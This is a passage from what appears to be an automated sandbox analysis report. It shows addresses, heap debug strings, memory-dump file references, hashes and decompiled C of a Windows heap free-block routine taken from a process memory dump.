0x025d9cf0
0x025d9cf1
0x025d9cf4
0x025d9cf6
0x025f9cf8
0x025f9cf8
0x025f9cfa
0x025f9cfc
0x025f9cfd
0x025f9cfe
0x025f9cff
0x025f9d01
0x025f9d06
0x025d9d07
0x025d9d07
0x025d9d10
0x00000000
0x025d9d10
0x025d9cfc
0x025d9d01
0x00000000
0x00000000
0x025d9d01
0x00000000
0x025d9ce3
0x025d9c49
0x025d9c5e
0x025d9c63
0x025d9c65
0x00000000
0x00000000
0x025d9c6b
0x025d9c72
0x025f9c73
0x025f9c76
0x025f9c7d
0x025f9c8c
0x025f9c8c
0x025f9c7d
0x025d9c78
0x025d9c7b
0x00000000
0x025d9c7b
0x025d9c2b
0x025d9c2e
0x025d9c32
0x00000000
0x00000000
0x025d9c34
0x025d9c36
0x00000000
0x00000000
0x025d9c3c
0x025d9c3f
0x00000000
0x00000000
0x00000000
0x025d9c3f
0x025d9c1a
0x025bee77
0x025bee7d
0x025d42d6
0x025d42d6
0x025d42d7
0x00000000
0x025d42d7
0x025bee86
0x025bee8b
0x00000000
0x025beeaa
0x025beeaa
0x025beeba
0x025beebd
0x025beecc
0x00000000
0x025beed2
0x025beed7
0x025beee8
0x025beef5
0x025beef9
0x025bef02
0x025bef0f
0x025bef11
0x025bef13
0x025bef17
0x025bef1c
0x025bef1e
0x025bef1e
0x025bef13
0x00000000
0x025beef9
0x025beecc

Strings

(LONG)FreeEntry->Size > 1, xrefs: 025F9CDA
HEAP: , xrefs: 025F9AC1, 025F9BC3, 025F9CCF, 025F9D7A
(UCRBlock != NULL), xrefs: 025F9ACC
(!TrailingUCR), xrefs: 025F9D85
HEAP[%wZ]: , xrefs: 025F9AB4, 025F9B20, 025F9BB6, 025F9CC2
((LONG)FreeEntry->Size > 1), xrefs: 025F9BCE

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 6ac88b0cfaf045c6a2bf43cb1c823f672bf96eaf2973f8221eea3d56563b0df6
Instruction ID: 6048d5d001120d3d54f38356bfdb6cd6b960bd20c175f8369b1d95e64d62ec01
Opcode Fuzzy Hash: 6ac88b0cfaf045c6a2bf43cb1c823f672bf96eaf2973f8221eea3d56563b0df6
Instruction Fuzzy Hash: 3F32F07160068AEFDB25CF68C484FAEBBF6FF44314F148449E9568B251C770EA81CB99

Uniqueness

Uniqueness Score: -1.00%

Function 025A7353, Relevance: 5.5, Strings: 4, Instructions: 466
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E025A7353(signed int _a4, signed int _a8, void* _a11, signed int _a12) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed short _t197;
				signed int _t200;
				signed int _t201;
				signed int _t205;
				signed short _t206;
				signed short _t210;
				signed short _t211;
				intOrPtr _t218;
				signed short _t220;
				signed int _t221;
				signed short _t223;
				signed short* _t225;
				signed short _t226;
				signed short* _t229;
				signed short _t230;
				signed short _t237;
				signed int _t239;
				signed short _t240;
				signed short _t248;
				signed short _t249;
				signed short _t257;
				signed int _t266;
				signed short _t268;
				signed int _t269;
				signed int _t270;
				signed short* _t276;
				signed short* _t277;
				signed int _t282;
				intOrPtr _t284;
				signed int* _t286;
				signed short _t291;
				signed short _t294;
				signed short _t297;
				signed short _t298;
				signed int _t299;
				signed short _t304;
				signed int _t305;
				signed short _t307;
				signed short _t310;
				signed short _t311;
				intOrPtr _t318;
				intOrPtr _t319;
				signed short _t320;
				signed short _t321;
				signed int _t323;
				void* _t327;
				signed short _t329;
				signed int _t330;
				intOrPtr _t333;
				signed int _t335;
				signed int _t336;
				signed short _t340;
				signed short _t341;
				signed short _t342;
				signed short _t343;
				signed int _t344;
				signed int _t348;
				signed int _t350;
				intOrPtr _t353;
				signed short* _t354;

				if(_a12 == 0) {
					return _t197;
				} else {
					_push(__ebx);
					_push(__esi);
					__esi = _a8;
					_push(__edi);
					__edi = _a4;
					__ebx = ( *(__esi + 4) ^  *(__edi + 0x54)) & 0x0000ffff;
					__eflags = __bx;
					if(__bx == 0) {
						__eflags =  *0x26777b0 - 1;
						if( *0x26777b0 >= 1) {
							__eflags =  *(__esi + 2) & 0x00000008;
							if(( *(__esi + 2) & 0x00000008) == 0) {
								__esi + 0xfff = __esi + 0x00000fff & 0xfffff000;
								__eflags = (__esi + 0x00000fff & 0xfffff000) - __esi;
								if((__esi + 0x00000fff & 0xfffff000) != __esi) {
									__eax =  *[fs:0x18];
									__eax =  *( *[fs:0x18] + 0x30);
									__eflags =  *(__eax + 0xc);
									if( *(__eax + 0xc) == 0) {
										_push("HEAP: ");
										__eax = E025E373B();
									} else {
										 *[fs:0x18] =  *( *[fs:0x18] + 0x30);
										 *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc));
										 *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c = E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
										_pop(__ecx);
									}
									_pop(__ecx);
									_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
									__eax = E025E373B();
									_pop(__ecx);
									__eax = E0263F826(__ebx, __edx, __edi, __esi, 1);
								}
							}
						}
					}
					__al =  *((intOrPtr*)(__esi + 6));
					__eflags = __al;
					if(__al == 0) {
						_v28 = __edi;
					} else {
						__ecx = __al & 0x000000ff;
						__eax = __esi;
						__ecx = (__al & 0x000000ff) << 0x10;
						__esi & 0xffff0000 = (__esi & 0xffff0000) - __ecx;
						__eax = (__esi & 0xffff0000) - __ecx + 0x10000;
						__eflags = __eax;
						_v28 = __eax;
					}
					__al =  *(__esi + 2);
					_a11 =  *(__esi + 2);
					do {
						__eflags = _a12 - 0xfe00;
						if(_a12 > 0xfe00) {
							__eflags = _a12 - 0xfe01;
							_v8 = 0xfe00;
							if(_a12 == 0xfe01) {
								_v8 = 0xfdf0;
							}
							_t354[1] = 0;
						} else {
							_v8 = _a12 & 0x0000ffff;
							_t354[1] = _a11;
						}
						_t333 = _a4;
						_t354[2] =  *(_t333 + 0x54) ^ _t266;
						_t205 = _v28;
						_t284 =  *((intOrPtr*)(_t205 + 0x18));
						__eflags = _t284 - _t205;
						if(_t284 == _t205) {
							_t268 = 0;
						} else {
							_t268 = (_t354 - _t205 >> 0x10) + 1;
							__eflags = _t268;
							if(__eflags <= 0) {
								L113:
								_push(0);
								_push(0);
								_push(_t205);
								_push(_t354);
								_push(_t284);
								_push(3);
								E0263F840(_t268, _t284, _t318, _t333, _t354, __eflags);
								L11:
								_t206 = _v8;
								_t354[1] = _t354[1] & 0x000000f0;
								_t354[3] = _t268;
								 *_t354 = _t206;
								_t354[1] = 0;
								_t354[3] = 0;
								__eflags =  *(_t333 + 0x40) & 0x00000040;
								_t269 = _t206 & 0x0000ffff;
								if(( *(_t333 + 0x40) & 0x00000040) != 0) {
									E025C89F0( &(_t354[8]), _t269 * 8 - 0x10, 0xfeeefeee);
									_t354[1] = _t354[1] | 0x00000004;
								}
								_t210 =  *(_t333 + 0xb8);
								__eflags = _t210;
								if(_t210 == 0) {
									_t211 =  *(_t333 + 0xc4);
									goto L41;
								} else {
									while(1) {
										__eflags = _t269 -  *((intOrPtr*)(_t210 + 4));
										if(_t269 <  *((intOrPtr*)(_t210 + 4))) {
											break;
										}
										_t311 =  *_t210;
										__eflags = _t311;
										if(_t311 != 0) {
											_t210 = _t311;
											continue;
										} else {
											_t298 =  *((intOrPtr*)(_t210 + 4)) - 1;
											__eflags = _t298;
											_v24 = _t298;
											L16:
											_t276 = _t210 + 0x14;
											while(1) {
												_t320 =  *(_t210 + 0x18);
												_t299 = _t298 -  *_t276;
												_v12 = _t210;
												_t218 =  *((intOrPtr*)(_t320 + 4));
												_v20 = _t320;
												__eflags = _t320 - _t218;
												if(_t320 == _t218) {
													goto L79;
												}
												L18:
												_t321 =  *(_t333 + 0x4c);
												_v32 = _t321;
												__eflags = _t321;
												if(_t321 == 0) {
													_t220 =  *(_t218 - 8) & 0x0000ffff;
												} else {
													_t249 =  *(_t218 - 8);
													_t330 =  *(_t333 + 0x4c);
													_v32 = _t330;
													__eflags = _t249 & _t330;
													if((_t249 & _t330) != 0) {
														_t249 = _t249 ^  *(_t333 + 0x50);
														__eflags = _t249;
													}
													_t220 = _t249 & 0x0000ffff;
												}
												_t221 = _v8 & 0x0000ffff;
												_v36 = _t221;
												__eflags = _t221 - (_t220 & 0x0000ffff);
												_t223 = _v20;
												if(_t221 - (_t220 & 0x0000ffff) > 0) {
													L73:
													_v16 = _t223;
													goto L40;
												} else {
													_t323 = _v32;
													_t225 =  *_t223 - 8;
													__eflags = _t323;
													if(_t323 == 0) {
														_t226 =  *_t225 & 0x0000ffff;
													} else {
														_t248 =  *_t225;
														_t323 =  *(_t333 + 0x4c);
														__eflags = _t248 & _t323;
														if((_t248 & _t323) != 0) {
															_t248 = _t248 ^  *(_t333 + 0x50);
															__eflags = _t248;
														}
														_t226 = _t248 & 0x0000ffff;
													}
													__eflags = _v36 - (_t226 & 0x0000ffff);
													if(_v36 - (_t226 & 0x0000ffff) <= 0) {
														_t223 =  *_v20;
														goto L73;
													} else {
														_t229 = _v12;
														__eflags =  *_t229;
														if( *_t229 != 0) {
															L84:
															_t230 = _v12;
															_t348 = _t299 >> 5;
															_t277 =  *((intOrPtr*)(_t230 + 0x1c)) + _t348 * 4;
															_t327 = ( *((intOrPtr*)(_t230 + 4)) -  *_t276 >> 5) - 1;
															_t237 =  !((1 << (_t299 & 0x0000001f)) - 1) &  *_t277;
															__eflags = 1;
															if(1 != 0) {
																L88:
																__eflags = _t237 & 0x0000ffff;
																if((_t237 & 0x0000ffff) == 0) {
																	_t304 = _t237 >> 0x00000010 & 0x000000ff;
																	__eflags = _t304;
																	if(_t304 != 0) {
																		_t163 = _t304 + 0x25a37f8; // 0x10008
																		_t239 = ( *_t163 & 0x000000ff) + 0x10;
																	} else {
																		_t162 = (_t237 >> 0x18) + 0x25a37f8; // 0x10008
																		_t239 = ( *_t162 & 0x000000ff) + 0x18;
																	}
																} else {
																	_t329 = _t237 & 0x000000ff;
																	__eflags = _t329;
																	if(_t329 == 0) {
																		_t161 = (_t237 >> 0x00000008 & 0x000000ff) + 0x25a37f8; // 0x10008
																		_t239 = ( *_t161 & 0x000000ff) + 8;
																	} else {
																		_t154 = _t329 + 0x25a37f8; // 0x10008
																		_t239 =  *_t154 & 0x000000ff;
																	}
																}
																_t350 = (_t348 << 5) + _t239;
																_t240 = _v12;
																__eflags =  *(_t240 + 8);
																_t305 = _t350 + _t350;
																if( *(_t240 + 8) == 0) {
																	_t305 = _t350;
																}
																_t223 =  *( *((intOrPtr*)(_t240 + 0x20)) + _t305 * 4);
																goto L73;
															} else {
																goto L85;
															}
															while(1) {
																L85:
																__eflags = _t348 - _t327;
																if(_t348 > _t327) {
																	break;
																}
																_t277 =  &(_t277[2]);
																_t237 =  *_t277;
																_t348 = _t348 + 1;
																__eflags = _t237;
																if(_t237 == 0) {
																	continue;
																}
																break;
															}
															__eflags = _t237;
															if(_t237 == 0) {
																_v16 = _v16 & 0x00000000;
																L40:
																_t211 = _v16;
																__eflags = _t211;
																if(_t211 == 0) {
																	_t210 =  *_v12;
																	_t333 = _a4;
																	_t276 = _t210 + 0x14;
																	_t298 =  *_t276;
																	_v24 = _t298;
																	_t320 =  *(_t210 + 0x18);
																	_t299 = _t298 -  *_t276;
																	_v12 = _t210;
																	_t218 =  *((intOrPtr*)(_t320 + 4));
																	_v20 = _t320;
																	__eflags = _t320 - _t218;
																	if(_t320 == _t218) {
																		goto L79;
																	}
																	goto L18;
																}
																L41:
																_t319 = _a4;
																_t77 = _t319 + 0xc4; // 0xc4
																__eflags = _t77 - _t211;
																if(_t77 == _t211) {
																	L48:
																	_t286 =  *(_t211 + 4);
																	_t270 =  *_t286;
																	_t331 =  &(_t354[4]);
																	__eflags = _t270 - _t211;
																	if(__eflags != 0) {
																		_push(0);
																		_push(_t270);
																		_push(0);
																		_push(_t211);
																		_push(0);
																		_push(0xc);
																		E0263F840(_t270, 0, _t319, _t331, _t354, __eflags);
																		_t318 = _a4;
																	} else {
																		 *_t331 = _t211;
																		 *(_t331 + 4) = _t286;
																		 *_t286 = _t331;
																		 *(_t211 + 4) = _t331;
																	}
																	 *((intOrPtr*)(_t318 + 0x78)) =  *((intOrPtr*)(_t318 + 0x78)) + ( *_t354 & 0x0000ffff);
																	_t197 =  *(_t318 + 0xb8);
																	__eflags = _t197;
																	if(_t197 == 0) {
																		L66:
																		if( *(_t318 + 0x4c) != 0) {
																			_t354[1] = _t354[0] ^ _t354[1] ^  *_t354;
																			 *_t354 =  *_t354 ^  *(_t318 + 0x50);
																		}
																		_t200 = _v8 & 0x0000ffff;
																		_a12 = _a12 - _t200;
																		_t266 = _v8 & 0x0000ffff;
																		_t354 = _t354 + _t200 * 8;
																		_t201 = _v28;
																		if(_t354 >=  *((intOrPtr*)(_t201 + 0x28))) {
																			L71:
																			return _t201;
																		} else {
																			goto L69;
																		}
																	} else {
																		_t291 =  *_t354 & 0x0000ffff;
																		while(1) {
																			__eflags = _t291 -  *((intOrPtr*)(_t197 + 4));
																			if(_t291 <  *((intOrPtr*)(_t197 + 4))) {
																				break;
																			}
																			_t343 =  *_t197;
																			__eflags = _t343;
																			if(_t343 != 0) {
																				_t197 = _t343;
																				continue;
																			}
																			_t291 =  *((intOrPtr*)(_t197 + 4)) - 1;
																			__eflags = _t291;
																			break;
																		}
																		_v32 = _t291;
																		_t282 = _t291 -  *((intOrPtr*)(_t197 + 0x14));
																		__eflags =  *(_t197 + 8);
																		_v20 = _t282;
																		_t335 = _t282 + _t282;
																		if( *(_t197 + 8) == 0) {
																			_t335 = _t282;
																		}
																		 *((intOrPtr*)(_t197 + 0xc)) =  *((intOrPtr*)(_t197 + 0xc)) + 1;
																		_t336 = _t335 << 2;
																		_v36 = _t336;
																		_v24 =  *(_t336 +  *(_t197 + 0x20));
																		__eflags = _v32 -  *((intOrPtr*)(_t197 + 4)) - 1;
																		if(_v32 ==  *((intOrPtr*)(_t197 + 4)) - 1) {
																			_t107 = _t197 + 0x10;
																			 *_t107 =  *(_t197 + 0x10) + 1;
																			__eflags =  *_t107;
																		}
																		_t340 = _v24;
																		__eflags = _t340;
																		if(_t340 == 0) {
																			L64:
																			_t331 =  *(_t197 + 0x20);
																			 *(_v36 +  *(_t197 + 0x20)) =  &(_t354[4]);
																			_t282 = _v20;
																			goto L65;
																		} else {
																			__eflags =  *(_t318 + 0x4c);
																			if( *(_t318 + 0x4c) == 0) {
																				_t341 =  *(_t340 - 8) & 0x0000ffff;
																			} else {
																				_t342 =  *(_t340 - 8);
																				__eflags =  *(_t318 + 0x4c) & _t342;
																				if(( *(_t318 + 0x4c) & _t342) != 0) {
																					_t342 = _t342 ^  *(_t318 + 0x50);
																					__eflags = _t342;
																				}
																				_t341 = _t342 & 0x0000ffff;
																			}
																			_t331 = _t341 & 0x0000ffff;
																			__eflags = ( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff);
																			if(( *_t354 & 0x0000ffff) - (_t341 & 0x0000ffff) > 0) {
																				L65:
																				__eflags = _v24;
																				if(_v24 == 0) {
																					 *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) =  *( *((intOrPtr*)(_t197 + 0x1c)) + (_t282 >> 5) * 4) | 1 << (_t282 & 0x0000001f);
																					_t318 = _a4;
																				}
																				goto L66;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																_t344 =  *(_t319 + 0x4c);
																while(1) {
																	__eflags = _t344;
																	if(_t344 == 0) {
																		_t294 =  *(_t211 - 8) & 0x0000ffff;
																	} else {
																		_t297 =  *(_t211 - 8);
																		_t344 =  *(_t319 + 0x4c);
																		__eflags = _t297 & _t344;
																		if((_t297 & _t344) != 0) {
																			_t297 = _t297 ^  *(_t319 + 0x50);
																			__eflags = _t297;
																		}
																		_t294 = _t297 & 0x0000ffff;
																	}
																	__eflags = (_v8 & 0x0000ffff) - (_t294 & 0x0000ffff);
																	if((_v8 & 0x0000ffff) <= (_t294 & 0x0000ffff)) {
																		goto L48;
																	}
																	_t211 =  *_t211;
																	_t189 = _t319 + 0xc4; // 0xc4
																	__eflags = _t189 - _t211;
																	if(_t189 == _t211) {
																		goto L48;
																	}
																}
																goto L48;
															}
															goto L88;
														}
														__eflags = _v24 - _t229[2] - 1;
														if(_v24 != _t229[2] - 1) {
															goto L84;
														}
														__eflags = _t229[4];
														if(_t229[4] != 0) {
															_t299 = _t299 + _t299;
															__eflags = _t299;
														}
														_t223 =  *(_t229[0x10] + _t299 * 4);
														__eflags = _v20 - _t223;
														if(_v20 == _t223) {
															goto L40;
														} else {
															_t353 = _a4;
															while(1) {
																__eflags = _t323;
																if(_t323 == 0) {
																	_t307 =  *(_t223 - 8) & 0x0000ffff;
																} else {
																	_t310 =  *(_t223 - 8);
																	_t323 =  *(_t353 + 0x4c);
																	__eflags = _t310 & _t323;
																	if((_t310 & _t323) != 0) {
																		_t310 = _t310 ^  *(_t353 + 0x50);
																		__eflags = _t310;
																	}
																	_t307 = _t310 & 0x0000ffff;
																}
																__eflags = (_v8 & 0x0000ffff) - (_t307 & 0x0000ffff);
																if((_v8 & 0x0000ffff) - (_t307 & 0x0000ffff) <= 0) {
																	goto L73;
																}
																_t223 =  *_t223;
																__eflags = _v20 - _t223;
																if(_v20 != _t223) {
																	continue;
																}
																goto L40;
															}
															goto L73;
														}
													}
												}
												L79:
												_v16 = _t320;
												goto L40;
											}
										}
									}
									_t298 = _t269;
									_v24 = _t269;
									goto L16;
								}
							}
							__eflags = _t268 - 0xfe;
							if(__eflags >= 0) {
								goto L113;
							}
						}
						goto L11;
						L69:
					} while (_a12 != 0);
					_t201 =  *(_a4 + 0x54) ^ _v8;
					_t354[2] = _t201;
					if(_v8 == 0) {
						__eflags =  *0x26777b0 - 1;
						if( *0x26777b0 >= 1) {
							_t201 =  &(_t354[0x7ff]) & 0xfffff000;
							__eflags = _t201 - _t354;
							if(_t201 != _t354) {
								_t257 =  *( *[fs:0x18] + 0x30);
								__eflags =  *(_t257 + 0xc);
								if( *(_t257 + 0xc) == 0) {
									_push("HEAP: ");
									E025E373B();
								} else {
									E025E373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *( *[fs:0x18] + 0x30) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
								E025E373B();
								_t201 = E0263F826(_t266, _t318, _t331, _t354, 1);
							}
						}
					}
					goto L71;
				}
			}

0x025a735f
0x025a7678
0x025a7365
0x025a7365
0x025a7366
0x025a7367
0x025a736e
0x025a736f
0x025a7376
0x025a7379
0x025a737c
0x025d9e61
0x025d9e68
0x025eda67
0x025eda6b
0x025eda77
0x025eda7c
0x025eda7e
0x025eda84
0x025eda8a
0x025eda8d
0x025eda91
0x025edab3
0x025edab8
0x025eda93
0x025eda99
0x025eda9f
0x025edaab
0x025edab0
0x025edab0
0x025edabd
0x025edabe
0x025edac3
0x025edac8
0x025edacb
0x025edacb
0x025eda7e
0x025eda6b
0x025d9e68
0x025a7382
0x025a7385
0x025a7387
0x025a7691
0x025a738d
0x025a738d
0x025a7390
0x025a7392
0x025a739a
0x025a739c
0x025a739c
0x025a73a1
0x025a73a1
0x025a73a4
0x025a73a7
0x025a73aa
0x025a73af
0x025a73b2
0x025d4be6
0x025d4bed
0x025d4bf0
0x025edad5
0x025edad5
0x025d4bf6
0x025a73b8
0x025a73bc
0x025a73c2
0x025a73c2
0x025a73c5
0x025a73cf
0x025a73d3
0x025a73d6
0x025a73d9
0x025a73db
0x025a7699
0x025a73e1
0x025a73e8
0x025a73e9
0x025a73eb
0x025edae1
0x025edae1
0x025edae3
0x025edae5
0x025edae6
0x025edae7
0x025edae8
0x025edaea
0x025a73fd
0x025a73fd
0x025a7400
0x025a7404
0x025a7407
0x025a740a
0x025a740e
0x025a7412
0x025a7416
0x025a7419
0x025edb05
0x025edb0a
0x025edb0a
0x025a741f
0x025a7425
0x025a7427
0x025be26a
0x00000000
0x025a742d
0x025a742d
0x025a742d
0x025a7430
0x00000000
0x00000000
0x025a7436
0x025a7438
0x025a743a
0x025a7683
0x00000000
0x025a7440
0x025a7443
0x025a7443
0x025a7444
0x025a7447
0x025a7447
0x025a744a
0x025a744a
0x025a744d
0x025a744f
0x025a7452
0x025a7455
0x025a7458
0x025a745a
0x00000000
0x00000000
0x025a7460
0x025a7460
0x025a7463
0x025a7466
0x025a7468
0x025d9eea
0x025a746e
0x025a746e
0x025a7471
0x025a7474
0x025a7477
0x025a7479
0x025a747b
0x025a747b
0x025a747b
0x025a747e
0x025a747e
0x025a7484
0x025a7488
0x025a748d
0x025a748f
0x025a7492
0x025a767b
0x025a767b
0x00000000
0x025a7498
0x025a749a
0x025a749d
0x025a74a0
0x025a74a2
0x025d9ef3
0x025a74a8
0x025a74a8
0x025a74aa
0x025a74ad
0x025a74af
0x025a74b1
0x025a74b1
0x025a74b1
0x025a74b4
0x025a74b4
0x025a74bf
0x025a74c1
0x025d3d2b
0x00000000
0x025a74c7
0x025a74c7
0x025a74ca
0x025a74cd
0x025d9d59
0x025d9d59
0x025d9d66
0x025d9d69
0x025d9d77
0x025d9d7b
0x025d9d7b
0x025d9d7d
0x025d9d95
0x025d9d98
0x025d9d9a
0x025d9e78
0x025d9e78
0x025d9e7e
0x025d9e92
0x025d9e99
0x025d9e80
0x025d9e83
0x025d9e8a
0x025d9e8a
0x025d9da0
0x025d9da7
0x025d9da7
0x025d9da9
0x025d9dd7
0x025d9dde
0x025d9dab
0x025d9dab
0x025d9dab
0x025d9dab
0x025d9da9
0x025d9db5
0x025d9db7
0x025d9dba
0x025d9dbe
0x025d9dc1
0x025edb13
0x025edb13
0x025d9dca
0x00000000
0x00000000
0x00000000
0x00000000
0x025d9d7f
0x025d9d7f
0x025d9d7f
0x025d9d81
0x00000000
0x00000000
0x025d9d83
0x025d9d86
0x025d9d88
0x025d9d89
0x025d9d8b
0x00000000
0x00000000
0x00000000
0x025d9d8b
0x025d9d8d
0x025d9d8f
0x025d9ecc
0x025a7526
0x025a7526
0x025a7529
0x025a752b
0x025d9ed8
0x025d9eda
0x025d9edd
0x025d9ee0
0x025d9ee2
0x025a744a
0x025a744d
0x025a744f
0x025a7452
0x025a7455
0x025a7458
0x025a745a
0x00000000
0x00000000
0x00000000
0x025a745a
0x025a7531
0x025a7531
0x025a7534
0x025a753a
0x025a753c
0x025a7568
0x025a7568
0x025a756b
0x025a756d
0x025a7570
0x025a7572
0x025edb31
0x025edb32
0x025edb33
0x025edb34
0x025edb35
0x025edb36
0x025edb38
0x025edb3d
0x025a7578
0x025a7578
0x025a757a
0x025a757d
0x025a757f
0x025a757f
0x025a7585
0x025a7588
0x025a758e
0x025a7590
0x025a7624
0x025a7628
0x025a7632
0x025a7638
0x025a7638
0x025a763a
0x025a763e
0x025a7641
0x025a7645
0x025a7648
0x025a764e
0x025a7674
0x00000000
0x00000000
0x00000000
0x00000000
0x025a7596
0x025a7596
0x025a7599
0x025a7599
0x025a759c
0x00000000
0x00000000
0x025a759e
0x025a75a0
0x025a75a2
0x025a768a
0x00000000
0x025a768a
0x025a75ab
0x025a75ab
0x00000000
0x025a75ab
0x025a75ac
0x025a75af
0x025a75b2
0x025a75b6
0x025a75b9
0x025a75bc
0x025edb45
0x025edb45
0x025a75c2
0x025a75c8
0x025a75cb
0x025a75d1
0x025a75d8
0x025a75db
0x025a75dd
0x025a75dd
0x025a75dd
0x025a75dd
0x025a75e0
0x025a75e3
0x025a75e5
0x025a760b
0x025a760b
0x025a7614
0x025a7617
0x00000000
0x025a75e7
0x025a75e7
0x025a75eb
0x025d9f0d
0x025a75f1
0x025a75f1
0x025a75f4
0x025a75f7
0x025a75f9
0x025a75f9
0x025a75f9
0x025a75fc
0x025a75fc
0x025a7602
0x025a7607
0x025a7609
0x025a761a
0x025a761a
0x025a761e
0x025a4479
0x025a447b
0x025a447b
0x00000000
0x00000000
0x00000000
0x00000000
0x025a7609
0x025a75e5
0x025a7590
0x025a753e
0x025a7541
0x025a7541
0x025a7543
0x025d9f04
0x025a7549
0x025a7549
0x025a754c
0x025a754f
0x025a7551
0x025a7553
0x025a7553
0x025a7553
0x025a7556
0x025a7556
0x025a7560
0x025a7562
0x00000000
0x00000000
0x025edb1a
0x025edb1c
0x025edb22
0x025edb24
0x00000000
0x00000000
0x025edb2a
0x00000000
0x025a7541
0x00000000
0x025d9d8f
0x025a74d7
0x025a74da
0x00000000
0x00000000
0x025a74e0
0x025a74e4
0x025a74e6
0x025a74e6
0x025a74e6
0x025a74eb
0x025a74ee
0x025a74f1
0x00000000
0x025a74f3
0x025a74f3
0x025a74f6
0x025a74f6
0x025a74f8
0x025d9efb
0x025a74fe
0x025a74fe
0x025a7501
0x025a7504
0x025a7506
0x025a7508
0x025a7508
0x025a7508
0x025a750b
0x025a750b
0x025a7517
0x025a7519
0x00000000
0x00000000
0x025a751f
0x025a7521
0x025a7524
0x00000000
0x00000000
0x00000000
0x025a7524
0x00000000
0x025a74f6
0x025a74f1
0x025a74c1
0x025b147c
0x025b147c
0x00000000
0x025b147c
0x025a744a
0x025a743a
0x025aab33
0x025aab35
0x00000000
0x025aab35
0x025a7427
0x025a73f1
0x025a73f7
0x00000000
0x00000000
0x025a73f7
0x00000000
0x025a7650
0x025a7650
0x025a7661
0x025a766a
0x025a766e
0x025edb4c
0x025edb53
0x025edb5f
0x025edb64
0x025edb66
0x025edb72
0x025edb75
0x025edb79
0x025edb9b
0x025edba0
0x025edb7b
0x025edb93
0x025edb98
0x025edba6
0x025edbab
0x025edbb3
0x025edbb3
0x025edb66
0x025edb53
0x00000000
0x025a766e

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 025EDABE
HEAP: , xrefs: 025EDAB3, 025EDB9B
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 025EDBA6
HEAP[%wZ]: , xrefs: 025EDAA6, 025EDB8E

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705091964.0000000002674000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705117987.0000000002677000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705152650.0000000002680000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705209135.00000000026E0000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: 0a77c3b627b32626716fd1d74448572e005db7a6563c4f37ce51d95d860033e4
Instruction ID: aefd44fe78998f2b4ac8194b3ea0c82f6076cf88945d8c98218dbc32e13e66a3
Opcode Fuzzy Hash: 0a77c3b627b32626716fd1d74448572e005db7a6563c4f37ce51d95d860033e4
Instruction Fuzzy Hash: CE02C071A00606CFDB28CF68C4A5B7EBBF1FF48304F198599E4568B691D334E981CB98

Uniqueness

Uniqueness Score: -1.00%

Function 025A351F, Relevance: 5.1, Strings: 3, Instructions: 1392COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 025FA498
HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 025FA4AC
HEAP[%wZ]: , xrefs: 025FA48B

Memory Dump Source

Source File: 00000007.00000002.704535932.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true

Associated: 00000007.00000002.704502552.0000000002570000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705023677.0000000002660000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.705048739.0000000002670000.00000040.00000001.sdmp Download File
